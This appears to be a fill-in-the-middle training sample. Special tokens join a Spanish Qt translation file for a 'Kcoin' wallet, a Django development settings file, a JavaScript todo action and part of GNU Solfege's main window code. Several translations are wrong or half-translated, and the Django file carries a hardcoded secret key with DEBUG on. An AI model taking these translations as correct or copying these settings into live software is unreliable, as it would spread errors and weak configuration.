<source>Reindexing blocks on disk...</source>
<translation>Cargando el index de bloques...</translation>
</message>
<message>
<source>Send coins to a Kcoin address</source>
<translation>Enviar monedas a una dirección kcoin</translation>
</message>
<message>
<source>Backup wallet to another location</source>
<translation>Respaldar billetera en otra ubicación</translation>
</message>
<message>
<source>Change the passphrase used for wallet encryption</source>
<translation>Cambiar la contraseña utilizada para la codificación de la billetera</translation>
</message>
<message>
<source>&Debug window</source>
<translation>Ventana &Debug</translation>
</message>
<message>
<source>Open debugging and diagnostic console</source>
<translation>Abre consola de depuración y diagnóstico</translation>
</message>
<message>
<source>Kcoin</source>
<translation>Kcoin</translation>
</message>
<message>
<source>Wallet</source>
<translation>Cartera</translation>
</message>
<message>
<source>&Send</source>
<translation>&Envía</translation>
</message>
<message>
<source>&Receive</source>
<translation>y recibir</translation>
</message>
<message>
<source>&Show / Hide</source>
<translation>&Mostrar/Ocultar</translation>
</message>
<message>
<source>Sign messages with your Kcoin addresses to prove you own them</source>
<translation>Firmar un mensaje para provar que usted es dueño de esta dirección</translation>
</message>
<message>
<source>&File</source>
<translation>&Archivo</translation>
</message>
<message>
<source>&Settings</source>
<translation>&Configuración</translation>
</message>
<message>
<source>&Help</source>
<translation>&Ayuda</translation>
</message>
<message>
<source>Tabs toolbar</source>
<translation>Barra de pestañas</translation>
</message>
<message>
<source>Kcoin Core</source>
<translation>kcoin core</translation>
</message>
<message>
<source>Error</source>
<translation>Error</translation>
</message>
<message>
<source>Warning</source>
<translation>Atención</translation>
</message>
<message>
<source>Information</source>
<translation>Información</translation>
</message>
<message>
<source>Up to date</source>
<translation>Actualizado</translation>
</message>
<message>
<source>Catching up...</source>
<translation>Recuperando...</translation>
</message>
<message>
<source>Sent transaction</source>
<translation>Transacción enviada</translation>
</message>
<message>
<source>Incoming transaction</source>
<translation>Transacción entrante</translation>
</message>
<message>
<source>Wallet is <b>encrypted</b> and currently <b>unlocked</b></source>
<translation>La billetera esta <b>codificada</b> y actualmente <b>desbloqueda</b></translation>
</message>
<message>
<source>Wallet is <b>encrypted</b> and currently <b>locked</b></source>
<translation>La billetera esta <b>codificada</b> y actualmente <b>bloqueda</b></translation>
</message>
</context>
<context>
<name>ClientModel</name>
<message>
<source>Network Alert</source>
<translation>Alerta de Red</translation>
</message>
</context>
<context>
<name>CoinControlDialog</name>
<message>
<source>Amount:</source>
<translation>Cantidad:</translation>
</message>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Confirmed</source>
<translation>Confirmado</translation>
</message>
<message>
<source>Priority</source>
<translation>prioridad</translation>
</message>
<message>
<source>Copy address</source>
<translation>Copia dirección</translation>
</message>
<message>
<source>Copy label</source>
<translation>Copia etiqueta</translation>
</message>
<message>
<source>Copy amount</source>
<translation>Copiar Cantidad</translation>
</message>
<message>
<source>medium</source>
<translation>medio</translation>
</message>
<message>
<source>yes</source>
<translation>si</translation>
</message>
<message>
<source>no</source>
<translation>no</translation>
</message>
<message>
<source>(no label)</source>
<translation>(sin etiqueta)</translation>
</message>
</context>
<context>
<name>EditAddressDialog</name>
<message>
<source>Edit Address</source>
<translation>Editar dirección</translation>
</message>
<message>
<source>&Label</source>
<translation>&Etiqueta</translation>
</message>
<message>
<source>&Address</source>
<translation>&Dirección</translation>
</message>
<message>
<source>New receiving address</source>
<translation>Nueva dirección para recibir</translation>
</message>
<message>
<source>New sending address</source>
<translation>Nueva dirección para enviar</translation>
</message>
<message>
<source>Edit receiving address</source>
<translation>Editar dirección de recepción</translation>
</message>
<message>
<source>Edit sending address</source>
<translation>Editar dirección de envio</translation>
</message>
<message>
<source>The entered address "%1" is already in the address book.</source>
<translation>La dirección introducida "%1" ya esta guardada en la libreta de direcciones.</translation>
</message>
<message>
<source>The entered address "%1" is not a valid Kcoin address.</source>
<translation>La dirección introducida "%1" no es una dirección Kcoin valida.</translation>
</message>
<message>
<source>Could not unlock wallet.</source>
<translation>No se pudo desbloquear la billetera.</translation>
</message>
<message>
<source>New key generation failed.</source>
<translation>La generación de nueva clave falló.</translation>
</message>
</context>
<context>
<name>FreespaceChecker</name>
<message>
<source>name</source>
<translation>Nombre</translation>
</message>
</context>
<context>
<name>HelpMessageDialog</name>
<message>
<source>Kcoin Core</source>
<translation>kcoin core</translation>
</message>
<message>
<source>version</source>
<translation>versión</translation>
</message>
<message>
<source>Usage:</source>
<translation>Uso:</translation>
</message>
</context>
<context>
<name>Intro</name>
<message>
<source>Welcome</source>
<translation>bienvenido</translation>
</message>
<message>
<source>Kcoin Core</source>
<translation>kcoin core</translation>
</message>
<message>
<source>Error</source>
<translation>Error</translation>
</message>
</context>
<context>
<name>OpenURIDialog</name>
<message>
<source>URI:</source>
<translation>url:</translation>
</message>
</context>
<context>
<name>OptionsDialog</name>
<message>
<source>Options</source>
<translation>Opciones</translation>
</message>
<message>
<source>&Main</source>
<translation>&Principal</translation>
</message>
<message>
<source>Reset all client options to default.</source>
<translation>Reestablece todas las opciones.</translation>
</message>
<message>
<source>&Network</source>
<translation>&Red</translation>
</message>
<message>
<source>Expert</source>
<translation>experto</translation>
</message>
<message>
<source>Automatically open the Kcoin client port on the router. This only works when your router supports UPnP and it is enabled.</source>
<translation>Abre automáticamente el puerto del cliente Kcoin en el router. Esto funciona solo cuando tu router es compatible con UPnP y está habilitado.</translation>
</message>
<message>
<source>Map port using &UPnP</source>
<translation>Direcciona el puerto usando &UPnP</translation>
</message>
<message>
<source>Proxy &IP:</source>
<translation>&IP Proxy:</translation>
</message>
<message>
<source>&Port:</source>
<translation>&Puerto:</translation>
</message>
<message>
<source>Port of the proxy (e.g. 9050)</source>
<translation>Puerto del servidor proxy (ej. 9050)</translation>
</message>
<message>
<source>&Window</source>
<translation>y windows
</translation>
</message>
<message>
<source>Show only a tray icon after minimizing the window.</source>
<translation>Muestra solo un ícono en la bandeja después de minimizar la ventana</translation>
</message>
<message>
<source>&Minimize to the tray instead of the taskbar</source>
<translation>&Minimiza a la bandeja en vez de la barra de tareas</translation>
</message>
<message>
<source>M&inimize on close</source>
<translation>M&inimiza a la bandeja al cerrar</translation>
</message>
<message>
<source>&Display</source>
<translation>&Mostrado</translation>
</message>
<message>
<source>&Unit to show amounts in:</source>
<translation>&Unidad en la que mostrar cantitades:</translation>
</message>
<message>
<source>Choose the default subdivision unit to show in the interface and when sending coins.</source>
<translation>Elige la subdivisión por defecto para mostrar cantidaded en la interfaz cuando se envien monedas</translation>
</message>
<message>
<source>&OK</source>
<translation>&OK</translation>
</message>
<message>
<source>&Cancel</source>
<translation>&Cancela</translation>
</message>
<message>
<source>default</source>
<translation>predeterminado</translation>
</message>
<message>
<source>Confirm options reset</source>
<translation>Confirmar reestablecimiento de las opciones</translation>
</message>
</context>
<context>
<name>OverviewPage</name>
<message>
<source>Form</source>
<translation>Formulario</translation>
</message>
<message>
<source>Total:</source>
<translation>Total:</translation>
</message>
</context>
<context>
<name>PaymentServer</name>
<message>
<source>Payment acknowledged</source>
<translation>Pago completado</translation>
</message>
</context>
<context>
<name>PeerTableModel</name><|fim▁hole|> <name>QObject</name>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>N/A</source>
<translation>N/A</translation>
</message>
</context>
<context>
<name>QRImageWidget</name>
<message>
<source>&Save Image...</source>
<translation>Guardar imagen...</translation>
</message>
<message>
<source>&Copy Image</source>
<translation>Copiar Imagen</translation>
</message>
</context>
<context>
<name>RPCConsole</name>
<message>
<source>Client name</source>
<translation>Nombre del cliente</translation>
</message>
<message>
<source>N/A</source>
<translation>N/A</translation>
</message>
<message>
<source>Client version</source>
<translation>Versión del Cliente</translation>
</message>
<message>
<source>&Information</source>
<translation>&Información</translation>
</message>
<message>
<source>General</source>
<translation>General</translation>
</message>
<message>
<source>Startup time</source>
<translation>Tiempo de inicio</translation>
</message>
<message>
<source>Network</source>
<translation>Red</translation>
</message>
<message>
<source>Name</source>
<translation>Nombre</translation>
</message>
<message>
<source>Number of connections</source>
<translation>Número de conexiones</translation>
</message>
<message>
<source>Block chain</source>
<translation>Bloquea cadena</translation>
</message>
<message>
<source>Version</source>
<translation>version
</translation>
</message>
<message>
<source>&Open</source>
<translation>&Abrir</translation>
</message>
<message>
<source>&Console</source>
<translation>&Consola</translation>
</message>
<message>
<source>Totals</source>
<translation>Total:</translation>
</message>
<message>
<source>Clear console</source>
<translation>Limpiar Consola</translation>
</message>
</context>
<context>
<name>ReceiveCoinsDialog</name>
<message>
<source>&Label:</source>
<translation>&Etiqueta:</translation>
</message>
<message>
<source>&Message:</source>
<translation>&mensaje</translation>
</message>
<message>
<source>Copy label</source>
<translation>Copia etiqueta</translation>
</message>
<message>
<source>Copy amount</source>
<translation>Copiar Cantidad</translation>
</message>
</context>
<context>
<name>ReceiveRequestDialog</name>
<message>
<source>QR Code</source>
<translation>Código QR </translation>
</message>
<message>
<source>Copy &Address</source>
<translation>&Copia dirección</translation>
</message>
<message>
<source>&Save Image...</source>
<translation>Guardar imagen...</translation>
</message>
<message>
<source>Address</source>
<translation>Dirección</translation>
</message>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Message</source>
<translation>Mensaje</translation>
</message>
</context>
<context>
<name>RecentRequestsTableModel</name>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Message</source>
<translation>Mensaje</translation>
</message>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>(no label)</source>
<translation>(sin etiqueta)</translation>
</message>
</context>
<context>
<name>SendCoinsDialog</name>
<message>
<source>Send Coins</source>
<translation>Enviar monedas</translation>
</message>
<message>
<source>Amount:</source>
<translation>Cantidad:</translation>
</message>
<message>
<source>Send to multiple recipients at once</source>
<translation>Enviar a múltiples destinatarios</translation>
</message>
<message>
<source>Add &Recipient</source>
<translation>&Agrega destinatario</translation>
</message>
<message>
<source>Clear &All</source>
<translation>&Borra todos</translation>
</message>
<message>
<source>Balance:</source>
<translation>Balance:</translation>
</message>
<message>
<source>Confirm the send action</source>
<translation>Confirma el envio</translation>
</message>
<message>
<source>S&end</source>
<translation>&Envía</translation>
</message>
<message>
<source>Confirm send coins</source>
<translation>Confirmar el envio de monedas</translation>
</message>
<message>
<source>Copy amount</source>
<translation>Copiar Cantidad</translation>
</message>
<message>
<source>The amount to pay must be larger than 0.</source>
<translation>La cantidad por pagar tiene que ser mayor 0.</translation>
</message>
<message>
<source>The amount exceeds your balance.</source>
<translation>La cantidad sobrepasa tu saldo.</translation>
</message>
<message>
<source>The total exceeds your balance when the %1 transaction fee is included.</source>
<translation>El total sobrepasa tu saldo cuando se incluyen %1 como tasa de envio.</translation>
</message>
<message>
<source>(no label)</source>
<translation>(sin etiqueta)</translation>
</message>
</context>
<context>
<name>SendCoinsEntry</name>
<message>
<source>A&mount:</source>
<translation>Cantidad:</translation>
</message>
<message>
<source>Pay &To:</source>
<translation>&Pagar a:</translation>
</message>
<message>
<source>Enter a label for this address to add it to your address book</source>
<translation>Introduce una etiqueta a esta dirección para añadirla a tu guia</translation>
</message>
<message>
<source>&Label:</source>
<translation>&Etiqueta:</translation>
</message>
<message>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<source>Paste address from clipboard</source>
<translation>Pega dirección desde portapapeles</translation>
</message>
<message>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<source>Message:</source>
<translation>Mensaje:</translation>
</message>
</context>
<context>
<name>ShutdownWindow</name>
</context>
<context>
<name>SignVerifyMessageDialog</name>
<message>
<source>&Sign Message</source>
<translation>&Firmar Mensaje</translation>
</message>
<message>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<source>Paste address from clipboard</source>
<translation>Pega dirección desde portapapeles</translation>
</message>
<message>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<source>Enter the message you want to sign here</source>
<translation>Escriba el mensaje que desea firmar</translation>
</message>
<message>
<source>Signature</source>
<translation>Firma</translation>
</message>
<message>
<source>Sign the message to prove you own this Kcoin address</source>
<translation>Firmar un mensjage para probar que usted es dueño de esta dirección</translation>
</message>
<message>
<source>Sign &Message</source>
<translation>Firmar Mensaje</translation>
</message>
<message>
<source>Clear &All</source>
<translation>&Borra todos</translation>
</message>
<message>
<source>&Verify Message</source>
<translation>&Firmar Mensaje</translation>
</message>
<message>
<source>Verify &Message</source>
<translation>&Firmar Mensaje</translation>
</message>
<message>
<source>Click "Sign Message" to generate signature</source>
<translation>Click en "Firmar Mensage" para conseguir firma</translation>
</message>
<message>
<source>Please check the address and try again.</source>
<translation>Por favor, revise la dirección Kcoin e inténtelo denuevo</translation>
</message>
<message>
<source>Wallet unlock was cancelled.</source>
<translation>Ha fallado el desbloqueo de la billetera</translation>
</message>
<message>
<source>Message signing failed.</source>
<translation>Firma fallida</translation>
</message>
<message>
<source>Message signed.</source>
<translation>Mensaje firmado</translation>
</message>
<message>
<source>Message verified.</source>
<translation>Mensaje comprobado</translation>
</message>
</context>
<context>
<name>SplashScreen</name>
<message>
<source>Kcoin Core</source>
<translation>kcoin core</translation>
</message>
<message>
<source>[testnet]</source>
<translation>[red-de-pruebas]</translation>
</message>
</context>
<context>
<name>TrafficGraphWidget</name>
<message>
<source>KB/s</source>
<translation>KB/s</translation>
</message>
</context>
<context>
<name>TransactionDesc</name>
<message>
<source>Open until %1</source>
<translation>Abierto hasta %1</translation>
</message>
<message>
<source>%1/offline</source>
<translation>%1/fuera de linea</translation>
</message>
<message>
<source>%1/unconfirmed</source>
<translation>%1/no confirmado</translation>
</message>
<message>
<source>%1 confirmations</source>
<translation>%1 confirmaciónes</translation>
</message>
<message>
<source>Status</source>
<translation>Estado</translation>
</message>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Generated</source>
<translation>Generado</translation>
</message>
<message>
<source>From</source>
<translation>De</translation>
</message>
<message>
<source>To</source>
<translation>A</translation>
</message>
<message>
<source>own address</source>
<translation>propia dirección</translation>
</message>
<message>
<source>label</source>
<translation>etiqueta</translation>
</message>
<message>
<source>Credit</source>
<translation>Credito</translation>
</message>
<message>
<source>not accepted</source>
<translation>no aceptada</translation>
</message>
<message>
<source>Debit</source>
<translation>Debito</translation>
</message>
<message>
<source>Transaction fee</source>
<translation>Comisión transacción</translation>
</message>
<message>
<source>Net amount</source>
<translation>Cantidad total</translation>
</message>
<message>
<source>Message</source>
<translation>Mensaje</translation>
</message>
<message>
<source>Comment</source>
<translation>Comentario</translation>
</message>
<message>
<source>Transaction ID</source>
<translation>ID de Transacción</translation>
</message>
<message>
<source>Transaction</source>
<translation>Transacción</translation>
</message>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>, has not been successfully broadcast yet</source>
<translation>, no ha sido emitido satisfactoriamente todavía</translation>
</message>
<message>
<source>unknown</source>
<translation>desconocido</translation>
</message>
</context>
<context>
<name>TransactionDescDialog</name>
<message>
<source>Transaction details</source>
<translation>Detalles de transacción</translation>
</message>
<message>
<source>This pane shows a detailed description of the transaction</source>
<translation>Esta ventana muestra información detallada sobre la transacción</translation>
</message>
</context>
<context>
<name>TransactionTableModel</name>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Type</source>
<translation>Tipo</translation>
</message>
<message>
<source>Open until %1</source>
<translation>Abierto hasta %1</translation>
</message>
<message>
<source>Confirmed (%1 confirmations)</source>
<translation>Confirmado (%1 confirmaciones)</translation>
</message>
<message>
<source>This block was not received by any other nodes and will probably not be accepted!</source>
<translation>Este bloque no ha sido recibido por otros nodos y probablemente no sea aceptado !</translation>
</message>
<message>
<source>Generated but not accepted</source>
<translation>Generado pero no acceptado</translation>
</message>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Received with</source>
<translation>Recibido con</translation>
</message>
<message>
<source>Received from</source>
<translation>Recibido de</translation>
</message>
<message>
<source>Sent to</source>
<translation>Enviado a</translation>
</message>
<message>
<source>Payment to yourself</source>
<translation>Pagar a usted mismo</translation>
</message>
<message>
<source>Mined</source>
<translation>Minado</translation>
</message>
<message>
<source>(n/a)</source>
<translation>(n/a)</translation>
</message>
<message>
<source>Transaction status. Hover over this field to show number of confirmations.</source>
<translation>Estado de transacción. Pasa el raton sobre este campo para ver el numero de confirmaciónes.</translation>
</message>
<message>
<source>Date and time that the transaction was received.</source>
<translation>Fecha y hora cuando se recibió la transaccion</translation>
</message>
<message>
<source>Type of transaction.</source>
<translation>Tipo de transacción.</translation>
</message>
<message>
<source>Amount removed from or added to balance.</source>
<translation>Cantidad restada o añadida al balance</translation>
</message>
</context>
<context>
<name>TransactionView</name>
<message>
<source>All</source>
<translation>Todo</translation>
</message>
<message>
<source>Today</source>
<translation>Hoy</translation>
</message>
<message>
<source>This week</source>
<translation>Esta semana</translation>
</message>
<message>
<source>This month</source>
<translation>Esta mes</translation>
</message>
<message>
<source>Last month</source>
<translation>Mes pasado</translation>
</message>
<message>
<source>This year</source>
<translation>Este año</translation>
</message>
<message>
<source>Range...</source>
<translation>Rango...</translation>
</message>
<message>
<source>Received with</source>
<translation>Recibido con</translation>
</message>
<message>
<source>Sent to</source>
<translation>Enviado a</translation>
</message>
<message>
<source>To yourself</source>
<translation>A ti mismo</translation>
</message>
<message>
<source>Mined</source>
<translation>Minado</translation>
</message>
<message>
<source>Other</source>
<translation>Otra</translation>
</message>
<message>
<source>Enter address or label to search</source>
<translation>Introduce una dirección o etiqueta para buscar</translation>
</message>
<message>
<source>Min amount</source>
<translation>Cantidad minima</translation>
</message>
<message>
<source>Copy address</source>
<translation>Copia dirección</translation>
</message>
<message>
<source>Copy label</source>
<translation>Copia etiqueta</translation>
</message>
<message>
<source>Copy amount</source>
<translation>Copiar Cantidad</translation>
</message>
<message>
<source>Edit label</source>
<translation>Edita etiqueta</translation>
</message>
<message>
<source>Show transaction details</source>
<translation>Mostrar detalles de la transacción</translation>
</message>
<message>
<source>Comma separated file (*.csv)</source>
<translation>Archivos separados por coma (*.csv)</translation>
</message>
<message>
<source>Confirmed</source>
<translation>Confirmado</translation>
</message>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Type</source>
<translation>Tipo</translation>
</message>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Address</source>
<translation>Dirección</translation>
</message>
<message>
<source>ID</source>
<translation>ID</translation>
</message>
<message>
<source>Range:</source>
<translation>Rango:</translation>
</message>
<message>
<source>to</source>
<translation>para</translation>
</message>
</context>
<context>
<name>UnitDisplayStatusBarControl</name>
</context>
<context>
<name>WalletFrame</name>
</context>
<context>
<name>WalletModel</name>
<message>
<source>Send Coins</source>
<translation>Enviar monedas</translation>
</message>
</context>
<context>
<name>WalletView</name>
<message>
<source>&Export</source>
<translation>y exportar</translation>
</message>
<message>
<source>Export the data in the current tab to a file</source>
<translation>Exportar los datos de la pestaña actual a un archivo</translation>
</message>
<message>
<source>Backup Wallet</source>
<translation>Respaldar billetera</translation>
</message>
<message>
<source>Wallet Data (*.dat)</source>
<translation>Datos de billetera (*.dat)</translation>
</message>
<message>
<source>Backup Failed</source>
<translation>Ha fallado el respaldo</translation>
</message>
</context>
<context>
<name>kcoin-core</name>
<message>
<source>Options:</source>
<translation>Opciones:
</translation>
</message>
<message>
<source>Specify data directory</source>
<translation>Especifica directorio para los datos
</translation>
</message>
<message>
<source>Accept command line and JSON-RPC commands</source>
<translation>Aceptar comandos consola y JSON-RPC
</translation>
</message>
<message>
<source>Run in the background as a daemon and accept commands</source>
<translation>Correr como demonio y acepta comandos
</translation>
</message>
<message>
<source>Use the test network</source>
<translation>Usa la red de pruebas
</translation>
</message>
<message>
<source>Warning: -paytxfee is set very high! This is the transaction fee you will pay if you send a transaction.</source>
<translation>Precaución: -paytxfee es muy alta. Esta es la comisión que pagarás si envias una transacción.</translation>
</message>
<message>
<source>Connect only to the specified node(s)</source>
<translation>Conecta solo al nodo especificado
</translation>
</message>
<message>
<source>Error loading block database</source>
<translation>Error cargando blkindex.dat</translation>
</message>
<message>
<source>Error: Disk space is low!</source>
<translation>Atención: Poco espacio en el disco duro</translation>
</message>
<message>
<source>Imports blocks from external blk000??.dat file</source>
<translation>Importar bloques desde el archivo externo blk000??.dat </translation>
</message>
<message>
<source>Information</source>
<translation>Información</translation>
</message>
<message>
<source>Send trace/debug info to console instead of debug.log file</source>
<translation>Enviar informacion de seguimiento a la consola en vez del archivo debug.log</translation>
</message>
<message>
<source>Start minimized</source>
<translation>Arranca minimizado
</translation>
</message>
<message>
<source>Use UPnP to map the listening port (default: 1 when listening)</source>
<translation>Intenta usar UPnP para mapear el puerto de escucha (default: 1 when listening)</translation>
</message>
<message>
<source>Username for JSON-RPC connections</source>
<translation>Usuario para las conexiones JSON-RPC
</translation>
</message>
<message>
<source>Warning</source>
<translation>Atención</translation>
</message>
<message>
<source>wallet.dat corrupt, salvage failed</source>
<translation>wallet.dat corrompió, guardado fallido</translation>
</message>
<message>
<source>Password for JSON-RPC connections</source>
<translation>Contraseña para las conexiones JSON-RPC
</translation>
</message>
<message>
<source>Upgrade wallet to latest format</source>
<translation>Actualizar billetera al formato actual</translation>
</message>
<message>
<source>Rescan the block chain for missing wallet transactions</source>
<translation>Rescanea la cadena de bloques para transacciones perdidas de la cartera
</translation>
</message>
<message>
<source>Use OpenSSL (https) for JSON-RPC connections</source>
<translation>Usa OpenSSL (https) para las conexiones JSON-RPC
</translation>
</message>
<message>
<source>This help message</source>
<translation>Este mensaje de ayuda
</translation>
</message>
<message>
<source>Allow DNS lookups for -addnode, -seednode and -connect</source>
<translation>Permite búsqueda DNS para addnode y connect
</translation>
</message>
<message>
<source>Loading addresses...</source>
<translation>Cargando direcciónes...</translation>
</message>
<message>
<source>Error loading wallet.dat: Wallet corrupted</source>
<translation>Error cargando wallet.dat: Billetera corrupta</translation>
</message>
<message>
<source>Error loading wallet.dat</source>
<translation>Error cargando wallet.dat</translation>
</message>
<message>
<source>Invalid -proxy address: '%s'</source>
<translation>Dirección -proxy invalida: '%s'</translation>
</message>
<message>
<source>Invalid amount for -paytxfee=<amount>: '%s'</source>
<translation>Cantidad inválida para -paytxfee=<amount>: '%s'</translation>
</message>
<message>
<source>Insufficient funds</source>
<translation>Fondos insuficientes</translation>
</message>
<message>
<source>Loading block index...</source>
<translation>Cargando el index de bloques...</translation>
</message>
<message>
<source>Add a node to connect to and attempt to keep the connection open</source>
<translation>Agrega un nodo para conectarse and attempt to keep the connection open</translation>
</message>
<message>
<source>Loading wallet...</source>
<translation>Cargando cartera...</translation>
</message>
<message>
<source>Rescanning...</source>
<translation>Rescaneando...</translation>
</message>
<message>
<source>Done loading</source>
<translation>Carga completa</translation>
</message>
<message>
<source>Error</source>
<translation>Error</translation>
</message>
</context>
</TS><|fim▁end|> | </context>
<context> |
<|file_name|>settings.py<|end_file_name|><|fim▁begin|>"""
Django settings for keyman project.
Generated by 'django-admin startproject' using Django 1.11.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$-2ijwgs8-3i*r#j@1ian5xrp+17)fz)%cdjjhwa#4x&%lk7v@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'keys',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'keyman.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'keyman.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',<|fim▁hole|>
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'<|fim▁end|> | 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
} |
<|file_name|>postTodo.js<|end_file_name|><|fim▁begin|>function postTodo ({input, state, output, services}) {
const todo = state.get(`app.todos.${input.ref}`)
services.http.post('/api/todos', todo)
.then(output.success)
.catch(output.error)
}<|fim▁hole|>postTodo.outputs = ['success', 'error']
export default postTodo<|fim▁end|> |
postTodo.async = true |
<|file_name|>mainwin.py<|end_file_name|><|fim▁begin|># vim: set fileencoding=utf-8 :
# GNU Solfege - free ear training software
# Copyright (C) 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2011 Tom Cato Amundsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import solfege
import webbrowser
import textwrap
# We move x-www-browser to the end of the list because on my
# debian etch system, the browser does will freeze solfege until
# I close the browser window.
try:
i = webbrowser._tryorder.index("x-www-browser")
webbrowser._tryorder.append(webbrowser._tryorder[i])
del webbrowser._tryorder[i]
except ValueError:
pass
import sys
import traceback
import locale
import os
import urllib
import shutil
try:
from pyalsa import alsaseq
except ImportError:
alsaseq = None
from solfege import winlang
from solfege import buildinfo
from solfege.esel import FrontPage, TestsView, SearchView
from gi.repository import Gtk
from gi.repository import Gdk
from solfege import utils
from solfege import i18n
class SplashWin(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, Gtk.WindowType.POPUP)
self.set_position(Gtk.WindowPosition.CENTER)
self.set_resizable(True)
frame = Gtk.Frame()
frame.set_shadow_type(Gtk.ShadowType.OUT)
self.add(frame)
vbox = Gtk.VBox()
vbox.set_border_width(20)
frame.add(vbox)
l = Gtk.Label(label=_("Starting GNU Solfege %s") % buildinfo.VERSION_STRING)
l.set_name("Heading1")
vbox.pack_start(l, True, True, 0)
l = Gtk.Label(label="http://www.solfege.org")
vbox.pack_start(l, True, True, 0)
self.g_infolabel = Gtk.Label(label='')
vbox.pack_start(self.g_infolabel, True, True, 0)
self.show_all()
def show_progress(self, txt):
self.g_infolabel.set_text(txt)
while Gtk.events_pending():
Gtk.main_iteration()
from solfege.configwindow import ConfigWindow
from solfege.profilemanager import ChangeProfileDialog
from solfege import gu
from solfege import cfg
from solfege import mpd
from solfege import lessonfile
from solfege import download_pyalsa
from solfege import statistics
from solfege import stock
from solfege import frontpage
from solfege import fpeditor
from solfege.trainingsetdlg import TrainingSetDialog
from solfege.practisesheetdlg import PractiseSheetDialog
from solfege import filesystem
class MusicViewerWindow(Gtk.Dialog):
def __init__(self):
Gtk.Dialog.__init__(self)
self.set_default_size(500, 300)
self.g_music_displayer = mpd.MusicDisplayer()
self.vbox.pack_start(self.g_music_displayer, True, True, 0)
b = gu.bButton(self.action_area, _("Close"), solfege.win.close_musicviewer)
b.grab_focus()
self.connect('destroy', solfege.win.close_musicviewer)
self.show_all()
def display_music(self, music):
fontsize = cfg.get_int('config/feta_font_size=20')
self.g_music_displayer.display(music, fontsize)
class MainWin(Gtk.Window, cfg.ConfigUtils):
default_front_page = os.path.join(lessonfile.exercises_dir, 'learningtree.txt')
debug_front_page = os.path.join(lessonfile.exercises_dir, 'debugtree.txt')
def __init__(self, options, datadir):
Gtk.Window.__init__(self, Gtk.WindowType.TOPLEVEL)
self._vbox = Gtk.VBox()
self._vbox.show()
self.add(self._vbox)
stock.SolfegeIconFactory(self, datadir)
Gtk.Settings.get_default().set_property('gtk-button-images', True)
cfg.ConfigUtils.__dict__['__init__'](self, 'mainwin')
self.set_resizable(self.get_bool('gui/mainwin_user_resizeable'))
self.add_watch('gui/mainwin_user_resizeable', lambda s: self.set_resizable(self.get_bool('gui/mainwin_user_resizeable')))
self.connect('delete-event', self.quit_program)
